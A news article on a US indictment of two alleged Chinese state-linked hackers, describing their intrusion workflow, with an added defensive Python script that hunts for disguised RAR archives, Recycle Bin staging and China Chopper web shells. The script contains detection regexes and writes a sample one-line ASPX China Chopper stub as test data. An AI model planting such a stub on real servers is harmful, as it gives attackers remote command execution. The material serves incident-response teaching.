Li Xiaoyu had a problem. At some point in his decade-long hacking spree with former college classmate Dong Jiazhi, as alleged in a recent Justice Department indictment, the Chinese national found himself unable to break into the mail server of a Burmese human rights group. The usual methods apparently hadn’t worked. For Li, the solution came from having a friend in high places: An officer with China’s Ministry of State Security handed him zero-day malware—unknown to security vendors, and so harder to defend against—to help finish off the job.
Other countries have long blurred the lines between criminal and state-sponsored hacking, particularly Russia, Iran, and North Korea. But in a detailed indictment unsealed by the Department of Justice Tuesday, the United States has for the first time officially accused China of belonging to that club. Since at least 2009, authorities say, Li and Dong have hacked hundreds of companies around the world. Their targets range from manufacturing and engineering companies to videogame and education software to solar energy to pharmaceuticals. More recently—and unsurprisingly, given the intense international interest—the pair has targeted firms working on Covid-19 vaccines and treatments. They’ve allegedly stolen invaluable intellectual property to pass along to their MSS handlers, while lining their own pockets along the way.
“China is using cyberintrusions as part of its rob, replicate, and replace strategy to technological development,” said assistant attorney general for national security John Demers at a press conference Tuesday. “China is providing a safe haven for criminal hackers who, as in this case, are hacking in part for their own personal gain, but willing to help the state and on call to do so.”
The indictment outlines at length how Li and Dong allegedly worked as a tag team. Dong would research victims and how they might be exploited; Li did the dirty work of compromising the networks and exfiltrating the data. The pair used the same general workflow regardless of the victim, which makes sense given the volume of attacks to which they have been linked. Efficiency at scale counts for a lot.
First, they would identify high-value targets, and attempt to get a foothold either through poorly configured networks or through fresh vulnerabilities that their targets hadn’t yet patched. On September 11, 2018, for instance, Adobe disclosed a critical bug in its ColdFusion platform; by October 20 of that year, Li had successfully exploited it to install a web shell, a small script planted on the server that accepts commands over ordinary HTTP requests, on the network of a US government biomedical research agency in Maryland.
Web shells were a staple of Li and Dong’s efforts, particularly one called “China Chopper,” a widely available and relatively simple tool: a one-line server-side script paired with a client that gives the attacker remote command execution on the compromised host, and from there a path into the rest of the network. The hackers would also run credential-stealing software to grab user names and passwords. Once they had sufficient visibility into a victim’s systems, they would amass the data they wanted to steal into a compressed RAR file.
Court documents outline certain steps the hackers took to hide their activity from there, like working primarily out of the Recycle Bin folder, a hidden system directory that Windows does not show by default. They would also give their web shells and RAR files innocuous names, such as changing an extension to “.jpg” to make a file look like a simple image rather than dozens or even hundreds of gigabytes of intellectual property. A rename changes only the name, though: the archive’s contents, starting with the RAR signature in its first bytes, still give it away to anyone who looks past the extension.
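The concealment steps above (a RAR archive renamed to look like an image, files staged under the Recycle Bin, a China Chopper stub sitting on the web server) are exactly what a responder hunts for on disk. The Python below is an added example written for this page, not code from the indictment or from any tool it names. It builds a small constructed directory tree (the SID, file names and contents are made up for the demonstration), then flags files whose leading bytes say RAR while their extension says otherwise, non-native files parked under $Recycle.Bin, and web files containing the familiar one-line ASPX and PHP China Chopper stubs. The regexes only cover those classic forms; obfuscated shells need more than this.

```python
"""Hunt for RAR archives with false extensions, foreign files in the Recycle Bin,
and classic China Chopper web shell stubs. Sample tree is constructed, not real."""
import re
import tempfile
from pathlib import Path

# RAR 4.x and RAR 5.x file signatures, from the RAR format specification.
RAR_MAGIC = (b"Rar!\x1a\x07\x00", b"Rar!\x1a\x07\x01\x00")
JPEG_MAGIC = b"\xff\xd8\xff"

# The well-known one-line China Chopper server stubs: eval() of a request parameter.
# The parameter name varies per deployment, so only the eval-of-input shape is pinned.
CHOPPER_PATTERNS = (
    re.compile(rb"eval\s*\(\s*Request\.Item\s*\[", re.I),            # ASPX / JScript form
    re.compile(rb"@?eval\s*\(\s*\$_(POST|REQUEST|GET)\s*\[", re.I),  # PHP form
)
WEB_EXTS = {".aspx", ".asp", ".php", ".jsp", ".cfm"}


def read_head(path, n=8):
    """Return the first n bytes of a file (enough for the RAR signatures)."""
    with open(path, "rb") as fh:
        return fh.read(n)


def find_staged_archives(root):
    """Return sorted (reason, relative_path) pairs for:
    - files whose bytes are RAR but whose extension is not .rar
    - files under $Recycle.Bin that are not Windows' own $I/$R metadata entries
    (heuristic: Windows only writes $I<id> and $R<id> files there itself)."""
    hits = []
    root = Path(root)
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if read_head(path).startswith(RAR_MAGIC) and path.suffix.lower() != ".rar":
            hits.append(("rar_with_false_extension", rel))
        parts = [p.lower() for p in path.parts]
        if "$recycle.bin" in parts and not path.name.startswith(("$I", "$R")):
            hits.append(("foreign_file_in_recycle_bin", rel))
    return sorted(hits)


def find_chopper_stubs(root):
    """Return sorted relative paths of web files matching a China Chopper stub."""
    hits = []
    root = Path(root)
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in WEB_EXTS:
            data = path.read_bytes()
            if any(p.search(data) for p in CHOPPER_PATTERNS):
                hits.append(path.relative_to(root).as_posix())
    return sorted(hits)


def build_sample_tree():
    """Constructed sample data for the demonstration (not evidence from the case)."""
    root = Path(tempfile.mkdtemp(prefix="hunt_"))
    rb = root / "$Recycle.Bin" / "S-1-5-21-1-2-3-1001"  # made-up user SID
    rb.mkdir(parents=True)
    (rb / "$I3F2A1B.txt").write_bytes(b"\x02" + b"\x00" * 7)      # native metadata entry
    (rb / "photo.jpg").write_bytes(RAR_MAGIC[1] + b"\x00" * 64)     # RAR5 disguised as image
    (root / "inetpub").mkdir()
    (root / "inetpub" / "ok.aspx").write_bytes(b'<%@ Page Language="C#" %><p>hello</p>')
    (root / "inetpub" / "up.aspx").write_bytes(
        b'<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>')
    (root / "pics").mkdir()
    (root / "pics" / "real.jpg").write_bytes(JPEG_MAGIC + b"\x00" * 32)   # genuine image
    (root / "share").mkdir()
    (root / "share" / "docs.rar").write_bytes(RAR_MAGIC[0] + b"\x00" * 64)  # honest RAR
    return root


if __name__ == "__main__":
    sample = build_sample_tree()
    for reason, rel in find_staged_archives(sample):
        print(f"{reason}: {rel}")
    for rel in find_chopper_stubs(sample):
        print(f"china_chopper_stub: {rel}")
```

On a real image you would point both functions at the mounted volume root rather than the constructed tree, and extend the magic-versus-extension check to other containers (ZIP, 7z) that attackers rename the same way. Note that the honest `docs.rar` and the genuine JPEG are not flagged: the check is on the mismatch between bytes and name, not on archives as such.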
The indictment contains only a fraction of the heists Li and Dong are linked to, but shows an impressive breadth of work. They allegedly stole 200GB from a California firm, including radio, laser, and antenna technology. Another 140GB from a Virginia defense contractor, comprising both details of projects for the US Air Force and the personal information of hundreds of employees and contractors. Over a terabyte of data from a mechanical engineering company at work on high-efficiency gas turbines. Not to mention a hit list that included multiple videogame and pharmaceutical companies, an educational software firm, Covid-19 research, and hundreds of other victims worldwide.
In some cases, it is unclear whether Li and Dong were acting on their own behalf or that of the Chinese government. In others, the lines are drawn more brightly. They allegedly stole emails between a dissident and former Tiananmen Square protestor and the Dalai Lama’s office, which would have no clear financial value but plenty of intrigue for the Chinese government. At the other extreme, they allegedly sent an email in 2017 to several employees of a Massachusetts software company with the subject line “Source Code To Be Leaked!” and demanded a $15,000 cryptocurrency payoff.
While this is the first time the US has lumped China in with other countries that mingle with cybercriminals, the allegation comes as little surprise to the security community. “The Chinese government has long relied on contractors to conduct cyberintrusions,” says Ben Read, senior manager of analysis at cybersecurity firm FireEye. “Using these freelancers allows the government to access a wider array of talent, while also providing some deniability in conducting these operations.”
Along with other recent high-profile China indictments—including of the country’s elite APT10 group and the four alleged Equifax hackers—the activity outlined Tuesday belies a widely touted “cybertruce” signed between China and the US in 2015. What had once seemed like a few cracks in the dam turns out to be a Grand Coulee-sized hole.
“I think the 2015 agreement was a major accomplishment, and it followed sustained pressure by the Obama administration on the Chinese government regarding malicious cyberactivity including intellectual property theft,” says Lisa Monaco, former homeland security advisor to Obama and currently a partner at law firm O’Melveny & Myers. “But the resurgence in activity by Chinese cyberactors demonstrates that cyberdeterrence must be strategic, coordinated, and sustained. An agreement is only going to be effective if there is a commitment to holding the other party accountable.”
Whatever deterrent effect indictments may have, it hasn’t been enough, given the ongoing enormity of the problem. “The scale and scope of the hacking activities sponsored by [Chinese] intelligence services against the US and our international partners is unlike any other threat we’re facing today,” said FBI deputy director David Bowdich at Tuesday’s press conference. “China steals intellectual property and research which bolsters its economy, and then they use that illicit gain as a weapon to silence any country that would dare challenge their illegal actions. This type of economic coercion is not what we expect from a trusted world leader. It is what we expect from an organized crime syndicate.”
That audacity has taken on even more significance as countries race to find Covid-19 vaccines and treatments. While the indictment stops short of alleging that Li and Dong have successfully stolen related data, it does list multiple attempted intrusions against companies working on the problem as far back as January of this year, in one case probing a California biotech firm for weaknesses literally the day after it announced that it was researching antiviral drugs for Covid-19. The FBI and Department of Homeland Security had already broadly decried China's disruptive Covid-19 hacking in May.
“This indictment shows the extremely high value that all governments, including China, place on COVID-19-related information,” says Read.
That interest, and the broader intellectual property theft, shows no signs of abating. The indictment was filed on July 7; it alleges six discrete instances of reconnaissance by Li, all on the same day, just three weeks earlier. Especially given Covid-19 travel restrictions, it seems unlikely that he or Dong will ever see a US courtroom.
Which in a sense makes it all the more reasonable to air out their alleged deeds now. If the US can't stop China's indiscriminate hacking, it can at least shine a spotlight on it.